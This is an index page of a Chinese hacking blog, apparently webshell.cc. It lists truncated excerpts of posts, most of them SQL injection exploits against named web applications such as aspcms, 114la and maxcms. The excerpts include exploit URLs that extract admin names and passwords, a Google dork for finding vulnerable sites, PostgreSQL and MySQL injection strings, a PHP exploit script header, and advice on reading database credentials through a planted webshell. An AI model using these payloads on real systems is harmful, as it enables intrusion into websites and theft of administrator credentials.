WebShell'S Blog

aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且 支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。 漏洞文件：/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转，所以要快，建议用快捷键复制 爆用户名EXP: https://www.webshell.cc/plug/productbuy.asp?id=2...

- 阅读全文 -

PHP伪静态，主要是为了隐藏传递的参数名；于网上搜索后整理伪静态四法 <?php //伪静态方法一 // localhost/php100/test.php?id|1@action|2 $Php2Html_FileUrl = $_SERVER["REQUEST_URI"]; echo $Php2Html_FileUrl."<br>";// /php100/test.php?id|...

- 阅读全文 -

首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和密码，你要找到用户名、密码、数据库所在的IP，然后连接上去 <!--#include file="xx.asp"--> <% set rs=server.createobject("ADODB.recordset") id = request("id") strS...

- 阅读全文 -

雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP 可以得到管理员帐号和MD5密码。 版本：<=1.5 EXP如下： <?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2...

- 阅读全文 -

5432端口 /*order by猜字段数*/ http://webshell.cc/detail.php?id=236+order+by+26-- /*判断postgresql数据库*/ http://webshell.cc/detail.php?id=236+and+1::int=1-- /*通过cast类型转换来暴postgresql信息*/ http://webshell.cc/detai...

- 阅读全文 -

select 1 from dual where 1/0=0 and 1=2 运行结果NULL select 1 from dual where 1/0=0 and 1=1 运行结果 抛出错误除数为0

- 阅读全文 -

注入点，注入点猜解字段数目，这些我就不介绍了。注入的时候from猜不出表段名来，可以看这里：http://bbs.blackbap.org/viewthread.php?tid=1215 如果知道了表段名出不来字段名，可以看这里： http://bbs.blackbap.org/viewthread.php?tid=1220 除了这两种，本文再介绍两种MySql的高级注入语句。 先说一个最简单的c...

- 阅读全文 -

漏洞危害：高危 一、漏洞文件：cart.aspx 搜索关键词：inurl:scoreindex.aspx exp ： /cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as ...

- 阅读全文 -

在文件admin/ admin_inc.asp中： Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where...

- 阅读全文 -

后台的登录注入点，不过悲剧的是无回显只能盲注。更悲剧的是mysql数据库是5一下的版本！ 不过还好站点是asp.net程序的使程序报错后能显示一些信息。 正文开始吧。 目标站点找了一圈没发现入口点，旁站没几个，不过幸运的是发现了个登录框的注入点！（应为这个旁站只有一个登录入口！） 刚开是在用户名那里输入了 admin'-- 报错了 You have an error in your SQL syn...

- 阅读全文 -